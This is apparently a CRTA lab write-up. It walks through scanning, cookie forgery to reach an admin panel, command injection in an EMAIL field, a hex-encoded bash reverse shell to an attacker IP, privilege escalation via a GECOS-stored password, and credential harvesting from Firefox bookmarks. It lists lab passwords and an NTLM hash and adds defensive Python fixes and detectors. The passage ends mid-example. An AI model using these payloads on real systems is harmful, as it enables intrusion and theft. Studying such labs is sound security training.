CRTA done
CRTA
Notes
OS:
Linux Ubuntu: Focal 20.04 / 4ubuntu0.11
AD
Technology:
IP Address:
VPN IP Range: 10.10.200.0/24
External IP Range: 192.168.80.0/24
Internal IP Range: 192.168.98.0/24
192.168.80.10 - Linux Ubuntu
192.168.98.2 - DC01
192.168.98.120 - CDC
192.168.98.30 - MGMT
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Users and passwords:
New account - http://192.168.80.10/registration.php
Jan Nowak
[email protected]
Qwerty
---
SSH - 192.168.80.10
L: privilege
P: Admin@962
---
Domain user: john - 192.168.98.30
U: [email protected]
P: User1@#$%6
---
Domain user: corpmngr - 192.168.98.120
U: corpmngr
P: User4&*&*
---
Domain user: krbtgt
U: krbtgt
H: aad3b435b51404eeaad3b435b51404ee
---
Domain user: Administrator
U: Administrator
H: aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60
Nmap: 192.168.80.10
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ sudo nmap -A -sV --script=default -p- -oA 192.168.80.10_nmap 192.168.80.10 ; cat 192.168.80.10_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-03 11:52 CEST
Nmap scan report for 192.168.80.10
Host is up (0.063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8d:c3:a7:a5:bf:16:51:f2:03:85:a7:37:ee:ae:8d:81 (RSA)
| 256 9a:b2:73:5a:e5:36:b4:91:d8:8c:f7:4a:d0:15:65:28 (ECDSA)
|_ 256 3c:16:a7:6a:b6:33:c5:83:ab:7f:99:60:6a:4c:09:11 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Cyber WareFare Labs
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4
OS details: Linux 4.19 - 5.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
ffuf: http://192.168.80.10
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ ffuf -u http://192.168.80.10/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 192.168.80.10_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.80.10/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 192.168.80.10_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
add.php [Status: 302, Size: 13412, Words: 2080, Lines: 429, Duration: 52ms]
assets [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 76ms]
[INFO] Adding a new job to the queue: http://192.168.80.10/assets/FUZZ
career.php [Status: 302, Size: 13175, Words: 1005, Lines: 424, Duration: 58ms]
config.php [Status: 200, Size: 2, Words: 3, Lines: 1, Duration: 64ms]
css [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 59ms]
[INFO] Adding a new job to the queue: http://192.168.80.10/css/FUZZ
down.php [Status: 200, Size: 326, Words: 37, Lines: 25, Duration: 97ms]
fonts [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 78ms]
[INFO] Adding a new job to the queue: http://192.168.80.10/fonts/FUZZ
index.php [Status: 200, Size: 4249, Words: 1890, Lines: 100, Duration: 58ms]
js [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 64ms]
[INFO] Adding a new job to the queue: http://192.168.80.10/js/FUZZ
logout.php [Status: 302, Size: 1, Words: 1, Lines: 2, Duration: 63ms]
order2.php [Status: 302, Size: 11807, Words: 1222, Lines: 408, Duration: 57ms]
os.php [Status: 200, Size: 727, Words: 46, Lines: 31, Duration: 58ms]
registration.php [Status: 200, Size: 3823, Words: 1667, Lines: 86, Duration: 91ms]
report.php [Status: 302, Size: 11107, Words: 795, Lines: 386, Duration: 67ms]
sam.txt [Status: 200, Size: 13, Words: 1, Lines: 2, Duration: 65ms]
search.php [Status: 200, Size: 444, Words: 42, Lines: 27, Duration: 63ms]
test5.php [Status: 200, Size: 401, Words: 142, Lines: 14, Duration: 93ms]
test6.php [Status: 200, Size: 2, Words: 3, Lines: 1, Duration: 56ms]
test7.php [Status: 302, Size: 51, Words: 4, Lines: 1, Duration: 61ms]
val.php [Status: 200, Size: 2941, Words: 1199, Lines: 83, Duration: 58ms]
[INFO] Starting queued job on target: http://192.168.80.10/assets/FUZZ
css [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 58ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/css/
fonts [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 52ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/fonts/
images [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 54ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/images/
js [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 58ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/js/
libs [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 70ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://192.168.80.10/assets/libs/
[INFO] Starting queued job on target: http://192.168.80.10/css/FUZZ
[INFO] Starting queued job on target: http://192.168.80.10/fonts/FUZZ
[INFO] Starting queued job on target: http://192.168.80.10/js/FUZZ
Open website: http://192.168.80.10
Just a login page, nothing interesting.
Create an account: http://192.168.80.10
Jan Nowak
[email protected]
Qwerty
Upload file: http://192.168.80.10/career.php
It looks like a rabbit hole; I can't upload a file.
Login as admin user: http://192.168.80.10/login.php
POST /index.php HTTP/1.1
Host: 192.168.80.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://192.168.80.10
Connection: keep-alive
Referer: http://192.168.80.10/index.php
Cookie: PHPSESSID=53t7alu2u6ovp596qo17rq4ukp
Upgrade-Insecure-Requests: 1
Priority: u=0, i
id=fake_user&password=Qwerty&remember=on
---
HTTP/1.1 302 Found
Date: Tue, 03 Jun 2025 11:17:48 GMT
Server: Apache/2.4.41 (Ubuntu)
location: logout.php
Set-Cookie: id=fake_user
Content-Length: 4252
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
---
GET /dashboard3.php HTTP/1.1
Host: 192.168.80.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Origin: http://192.168.80.10
Connection: keep-alive
Referer: http://192.168.80.10/dashboard3.php
Cookie: PHPSESSID=53t7alu2u6ovp596qo17rq4ukp;id=admin
Upgrade-Insecure-Requests: 1
Priority: u=0, i
---
<div class="col-lg-2 col-md-3 col-12">
<div class="right-bar">
<!-- Search Form -->
<a href=# class=single-icon><i class=fa fa-user-circle-o aria-hidden=true></i>admin</li> <div class="sinlge-bar">
<a href="#" class="single-icon"><i class="fa fa-user-circle-o" aria-hidden="true"></i></a>
<a>
</div>
<a href="logout.php?logout"> <i class="fe-log-out"></i><span>Logout</span>
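The exchange above shows the application deriving the logged-in identity from the `id` cookie, which the client fully controls, so rewriting it to `id=admin` is enough to reach the admin dashboard. The following is an added example (mine, not the lab application's code) that models that flawed check next to the corrected pattern, where the cookie carries only an opaque random session id and a server-side store decides who the user is. The user table, salt and password in it are constructed for the example.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple


def _hash_password(password: str, salt: bytes) -> bytes:
    # Slow, salted hash for stored passwords (PBKDF2-HMAC-SHA256).
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user table: username -> (salt, password hash). Not the lab's real accounts.
_SALT_JAN = b"constructed-salt-jan"
USERS: Dict[str, Tuple[bytes, bytes]] = {
    "jan": (_SALT_JAN, _hash_password("Qwerty", _SALT_JAN)),
}


def current_user_vulnerable(cookies: Dict[str, str]) -> Optional[str]:
    """Flawed pattern seen in the lab: the identity is whatever the client put in the 'id' cookie."""
    return cookies.get("id")


class SessionStore:
    """Hardened pattern: the cookie carries only an opaque random session id; the mapping
    from session id to user lives on the server, so the client cannot choose its identity."""

    def __init__(self) -> None:
        self._sessions: Dict[str, str] = {}

    def login(self, username: str, password: str) -> Optional[str]:
        record = USERS.get(username)
        if record is None:
            return None
        salt, expected = record
        # compare_digest avoids leaking the comparison result through timing
        if not hmac.compare_digest(_hash_password(password, salt), expected):
            return None
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = username
        return session_id

    def current_user(self, cookies: Dict[str, str]) -> Optional[str]:
        # Only the server-side lookup decides who the user is; an 'id' cookie is ignored.
        return self._sessions.get(cookies.get("PHPSESSID", ""))

    def logout(self, cookies: Dict[str, str]) -> None:
        self._sessions.pop(cookies.get("PHPSESSID", ""), None)
```

With the hardened store, a forged `id=admin` cookie changes nothing: the only way to become a user is to pass `login()`, and the identity is bound to the random session id the server handed out.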
Command injection: http://192.168.80.10/dashboard3.php
Entered the payload in the EMAIL field
---
POST /dashboard3.php HTTP/1.1
Host: 192.168.80.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Origin: http://192.168.80.10
Connection: keep-alive
Referer: http://192.168.80.10/dashboard3.php
Cookie: PHPSESSID=53t7alu2u6ovp596qo17rq4ukp;id=admin
Upgrade-Insecure-Requests: 1
Priority: u=0, i
EMAIL=test%40wp.pl;ls
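The EMAIL value is evidently handed to a shell on the server, so the `;ls` after the address runs as a second command. As an added example (not the lab application's code), here is how that field should be handled, plus a small detector a defender can run over captured form bodies: a strict allowlist for the address, an argument vector instead of a shell string (with `shlex.quote` as the fallback when a shell is unavoidable), and a scan that flags parameter values carrying shell metacharacters. The lookup command and the file path are hypothetical; the form body in the test is constructed.

```python
import re
import shlex
from typing import List, Tuple
from urllib.parse import unquote_plus

# Strict allowlist for the field: anything outside it (';', '|', '`', '$', ...) is rejected.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")
# Characters that change meaning once a value reaches a shell.
SHELL_META = set(";|&`$(){}<>\n\r")


def validate_email(value: str) -> bool:
    return EMAIL_RE.fullmatch(value) is not None


def build_lookup_argv(email: str) -> List[str]:
    """Build the command as an argument vector; no shell ever parses the value."""
    if not validate_email(email):
        raise ValueError("rejected email value")
    # Hypothetical lookup command and placeholder path, for illustration only.
    return ["grep", "-F", "--", email, "/srv/app/subscribers.txt"]


def shell_safe_command(email: str) -> str:
    """If a shell string is unavoidable, quote the value so metacharacters lose their meaning."""
    return "grep -F -- " + shlex.quote(email) + " /srv/app/subscribers.txt"


def scan_form_body(body: str) -> List[Tuple[str, str]]:
    """Detection side: decode an x-www-form-urlencoded body and flag values with shell metacharacters."""
    findings = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if SHELL_META & set(value):
            findings.append((name, value))
    return findings
```

The allowlist is the real fix; `shlex.quote` only matters when an existing code path cannot be moved off `system()`-style calls, and the scanner is useful on a reverse proxy or WAF log that records request bodies.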
Revshell
Create a payload - hex
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ echo "bash -i >& /dev/tcp/10.10.200.239/22 0>&1" | xxd -ps -c 1024
62617368202d69203e26202f6465762f7463702f31302e31302e3230302e3233392f323220303e26310a
Run revshell
POST /dashboard3.php HTTP/1.1
Host: 192.168.80.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Origin: http://192.168.80.10
Connection: keep-alive
Referer: http://192.168.80.10/dashboard3.php
Cookie: PHPSESSID=53t7alu2u6ovp596qo17rq4ukp;id=admin
Upgrade-Insecure-Requests: 1
Priority: u=0, i
EMAIL=test%40wp.pl;echo+62617368202d69203e26202f6465762f7463702f31302e31302e3230302e3233392f323220303e26310a+|+xxd+-ps+-r+|+bash
Start netcat listener
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ netcat -lvnp 22
listening on [any] 22 ...
connect to [10.10.200.239] from (UNKNOWN) [192.168.80.10] 54546
bash: cannot set terminal process group (898): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu-virtual-machine:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu-virtual-machine:/var/www/html$
Read /etc/passwd
Found the password for user privilege in the GECOS field
L: privilege
P: Admin@962
---
www-data@ubuntu-virtual-machine:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:127:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
geoclue:x:123:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:127:132:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
ubuntu:x:1000:1000:ubuntu,,,:/home/ubuntu:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
privilege:x:1001:1001:Admin@962:/home/privilege:/bin/bash
sshd:x:128:65534::/run/sshd:/usr/sbin/nologin
mysql:x:129:135:MySQL Server,,,:/nonexistent:/bin/false
www-data@ubuntu-virtual-machine:/var/www/html$
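The `privilege` entry carries its password in the GECOS (comment) field of /etc/passwd, a file every local user can read, which is what made the `www-data` shell enough to move to an account in the sudo group. As an added audit example (mine, not from the writeup), the script below parses passwd-format text and flags accounts whose GECOS looks like a credential, together with interactive-shell and UID 0 accounts. The sample input is constructed; its lines copy the format of the host's file.

```python
import string
from typing import Dict, List

# Constructed sample in /etc/passwd format (a subset of the lines seen on the host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
ubuntu:x:1000:1000:ubuntu,,,:/home/ubuntu:/bin/bash
privilege:x:1001:1001:Admin@962:/home/privilege:/bin/bash
mysql:x:129:135:MySQL Server,,,:/nonexistent:/bin/false
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_passwd(text: str) -> List[Dict[str, str]]:
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; a real audit would report it separately
        name, _, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "uid": uid, "gid": gid,
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def looks_like_secret(gecos: str) -> bool:
    """Heuristic: the 'full name' part of GECOS is one token mixing letters, digits and symbols."""
    full_name = gecos.split(",")[0].strip()
    if len(full_name) < 8 or " " in full_name:
        return False
    has_letter = any(c.isalpha() for c in full_name)
    has_digit = any(c.isdigit() for c in full_name)
    has_symbol = any(c in string.punctuation for c in full_name)
    return has_letter and has_digit and has_symbol


def audit_passwd(text: str) -> Dict[str, List[str]]:
    entries = parse_passwd(text)
    return {
        "secret_in_gecos": [e["name"] for e in entries if looks_like_secret(e["gecos"])],
        "interactive": [e["name"] for e in entries if e["shell"] not in NOLOGIN_SHELLS],
        "uid_zero": [e["name"] for e in entries if e["uid"] == "0"],
    }
```

The heuristic will miss a password that is a plain dictionary word and may flag an unusual real name, so treat the output as a review list; the fix on the host is to clear the field (`chfn`) and rotate the exposed password.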
Login as root user
┌──(kali㉿kali)-[~/Desktop/writeups/CRTA]
└─$ ssh privilege@192.168.80.10
The authenticity of host '192.168.80.10 (192.168.80.10)' can't be established.
ED25519 key fingerprint is SHA256:RHpGTqvkXkAP6/HA3vpHP8gkrtApbfyYYjteCh3N/TE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.80.10' (ED25519) to the list of known hosts.
privilege@192.168.80.10's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-67-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
273 updates can be applied immediately.
273 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Tue Jun 3 17:47:16 2025 from 10.10.200.207
privilege@ubuntu-virtual-machine:~$ id
uid=1001(privilege) gid=1001(privilege) groups=1001(privilege),27(sudo)
privilege@ubuntu-virtual-machine:~$ sudo -i
[sudo] password for privilege:
root@ubuntu-virtual-machine:~# cd /root
root@ubuntu-virtual-machine:~# ls -a
. .. .bash_history .bashrc .cache .local .mysql_history .profile snap .sqlite_history
root@ubuntu-virtual-machine:~#
Mozilla Firefox config file
Find the profile directory for user privilege
privilege@ubuntu-virtual-machine:~/.mozilla/firefox/b2rri1qd.default-release$ ls -la
total 11864
drwx------ 14 privilege privilege 4096 Jan 19 20:27 .
drwx------ 6 privilege privilege 4096 Jan 16 17:22 ..
-rw-rw-r-- 1 privilege privilege 24 Jan 19 17:31 addons.json
-rw-rw-r-- 1 privilege privilege 6660 Jan 17 13:02 addonStartup.json.lz4
-rw-rw-r-- 1 privilege privilege 0 Jan 19 20:27 AlternateServices.txt
drwxr-xr-x 2 privilege privilege 4096 Jan 17 13:28 bookmarkbackups
-rw-rw-r-- 1 privilege privilege 216 Jan 17 13:16 broadcast-listeners.json
drwx------ 3 privilege privilege 4096 Jan 16 17:31 browser-extension-data
-rw------- 1 privilege privilege 229376 Jan 16 17:31 cert9.db
-rw------- 1 privilege privilege 161 Jan 16 17:22 compatibility.ini
-rw-rw-r-- 1 privilege privilege 939 Jan 16 17:22 containers.json
-rw-r--r-- 1 privilege privilege 229376 Jan 16 17:22 content-prefs.sqlite
-rw-r--r-- 1 privilege privilege 98304 Jan 16 17:22 cookies.sqlite
drwx------ 3 privilege privilege 4096 Jan 17 13:16 crashes
-rw-r--r-- 1 privilege privilege 98304 Jan 16 17:24 credentialstate.sqlite
drwxr-xr-x 4 privilege privilege 4096 Jan 19 20:27 datareporting
-rw-rw-r-- 1 privilege privilege 633 Jan 16 17:22 ExperimentStoreData.json
-rw-rw-r-- 1 privilege privilege 985 Jan 16 17:31 extension-preferences.json
-rw-rw-r-- 1 privilege privilege 41280 Jan 19 17:32 extensions.json
drwxr-xr-x 2 privilege privilege 4096 Jan 16 17:31 extension-store
-rw-r--r-- 1 privilege privilege 5242880 Jan 16 21:03 favicons.sqlite
-rw-r--r-- 1 privilege privilege 262144 Jan 17 13:06 formhistory.sqlite
drwxr-xr-x 3 privilege privilege 4096 Jan 17 17:32 gmp-gmpopenh264
-rw-rw-r-- 1 privilege privilege 410 Jan 16 17:22 handlers.json
-rw------- 1 privilege privilege 294912 Jan 16 17:22 key4.db
lrwxrwxrwx 1 privilege privilege 16 Jan 17 13:15 lock -> 127.0.1.1:+25657
drwx------ 2 privilege privilege 4096 Jan 16 17:22 minidumps
-rw-rw-r-- 1 privilege privilege 0 Jan 17 13:15 .parentlock
-rw-r--r-- 1 privilege privilege 98304 Jan 17 13:07 permissions.sqlite
-rw------- 1 privilege privilege 481 Jan 16 17:22 pkcs11.txt
-rw-r--r-- 1 privilege privilege 5242880 Jan 19 20:27 places.sqlite
-rw------- 1 privilege privilege 11986 Jan 19 20:27 prefs.js
-rw-r--r-- 1 privilege privilege 65536 Jan 17 13:02 protections.sqlite
drwx------ 2 privilege privilege 4096 Jan 19 20:27 saved-telemetry-pings
-rw-rw-r-- 1 privilege privilege 371 Jan 16 17:31 search.json.mozlz4
drwxrwxr-x 2 privilege privilege 4096 Jan 16 17:27 security_state
-rw-rw-r-- 1 privilege privilege 288 Jan 19 20:27 sessionCheckpoints.json
drwxr-xr-x 2 privilege privilege 4096 Jan 19 20:27 sessionstore-backups
-rw-rw-r-- 1 privilege privilege 566 Jan 19 20:27 sessionstore.jsonlz4
drwxr-xr-x 2 privilege privilege 4096 Jan 17 13:15 settings
-rw-rw-r-- 1 privilege privilege 18 Jan 16 17:22 shield-preference-experiments.json
-rw-rw-r-- 1 privilege privilege 907 Jan 17 13:20 SiteSecurityServiceState.txt
drwxr-xr-x 6 privilege privilege 4096 Jan 16 17:24 storage
-rw-r--r-- 1 privilege privilege 4096 Jan 19 20:27 storage.sqlite
-rwx------ 1 privilege privilege 50 Jan 16 17:22 times.json
-rw-r--r-- 1 privilege privilege 98304 Jan 16 17:24 webappsstore.sqlite
-rw-rw-r-- 1 privilege privilege 634 Jan 19 20:27 xulstore.json
Read table moz_bookmarks from places.sqlite
privilege@ubuntu-virtual-machine:~/.mozilla/firefox/b2rri1qd.default-release$ sqlite3 places.sqlite
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
moz_anno_attributes moz_keywords
moz_annos moz_meta
moz_bookmarks moz_origins
moz_bookmarks_deleted moz_places
moz_historyvisits moz_places_metadata
moz_inputhistory moz_places_metadata_search_queries
moz_items_annos moz_previews_tombstones
Found creds for user [email protected]
IP: 192.168.98.30
U: [email protected]
P: User1@#$%6
---
sqlite> SELECT * FROM moz_bookmarks;
1|2||0|0||||1737028376389000|1737028407427000|root________|1|1
2|2||1|0|menu|||1737028376389000|1737028376683000|menu________|1|3
3|2||1|1|toolbar|||1737028376389000|1737028376773000|toolbar_____|1|3
4|2||1|2|tags|||1737028376389000|1737028376389000|tags________|1|1
5|2||1|3|unfiled|||1737028376389000|1737028407427000|unfiled_____|1|3
6|2||1|4|mobile|||1737028376397000|1737028376662000|mobile______|1|2
7|2||2|0|Mozilla Firefox|||1737028376683000|1737028376683000|2hqCSTYguEKz|0|1
8|1|3|7|0|Get Help|||1737028376683000|1737028376683000|w8bhWWymMHw6|0|1
9|1|4|7|1|Customize Firefox|||1737028376683000|1737028376683000|uctFzas86dQw|0|1
10|1|5|7|2|Get Involved|||1737028376683000|1737028376683000|z-X79YDQmgEh|0|1
11|1|6|7|3|About Us|||1737028376683000|1737028376683000|GeWYCw2g0FLJ|0|1
12|2||2|1|Ubuntu and Free Software links|||1737028376683000|1737028376683000|MxAMPgqX16gZ|0|1
13|1|7|12|0|Ubuntu|||1737028376683000|1737028376683000|QqE4CH5UIHOL|0|1
14|1|8|12|1|Ubuntu Wiki (community-edited website)|||1737028376683000|1737028376683000|nbf_eTKjwhpv|0|1
15|1|9|12|2|Make a Support Request to the Ubuntu Community|||1737028376683000|1737028376683000|ukdJ8dcfVTPm|0|1
16|1|10|12|3|Debian (Ubuntu is based on Debian)|||1737028376683000|1737028376683000|xgQMK5g3l2Zp|0|1
17|1|11|3|0|Getting Started|||1737028376773000|1737028376773000|Kt6IQ_eV70GT|0|1
18|1|16|5|0|http://192.168.98.30/admin/[email protected]&pass=User1@#$%6|||1737028407427000|1737029666390000|tuXr2pTr03P2|1|7
sqlite>
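Bookmark 18 stores a complete login URL with the user name and password in the query string, which is why a browser profile is worth auditing on any host where a user has shell access. Added example (mine, not the writeup's or Firefox's code): it builds a constructed in-memory subset of the places.sqlite schema (only the moz_places and moz_bookmarks columns it needs), then scans bookmark URLs and titles for credential-like query parameters and for the `user:password@host` form. The URLs and passwords in the sample are placeholders, not the lab's.

```python
import sqlite3
from typing import Dict, List
from urllib.parse import urlsplit

CREDENTIAL_PARAMS = {"pass", "password", "passwd", "pwd", "pw", "secret", "token", "api_key", "apikey"}


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory subset of the places.sqlite schema (only the columns used here)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT);
        CREATE TABLE moz_bookmarks (id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER,
                                    parent INTEGER, position INTEGER, title TEXT);
    """)
    conn.executemany("INSERT INTO moz_places VALUES (?, ?, ?)", [
        (1, "https://support.mozilla.org/products/firefox", "Get Help"),
        (2, "https://www.ubuntu.com/", "Ubuntu"),
        # constructed: login URL with credentials in the query string, like bookmark 18
        (3, "http://192.168.98.30/admin/login.php?user=john&pass=Placeholder%21Secret1", None),
        # constructed: credentials in the URL userinfo part
        (4, "https://user:placeholder@intranet.example/", None),
    ])
    conn.executemany("INSERT INTO moz_bookmarks VALUES (?, ?, ?, ?, ?, ?)", [
        (1, 1, 1, 7, 0, "Get Help"),
        (2, 1, 2, 12, 0, "Ubuntu"),
        (3, 1, 3, 5, 0, "http://192.168.98.30/admin/login.php?user=john&pass=Placeholder%21Secret1"),
        (4, 1, 4, 5, 1, "Intranet"),
    ])
    return conn


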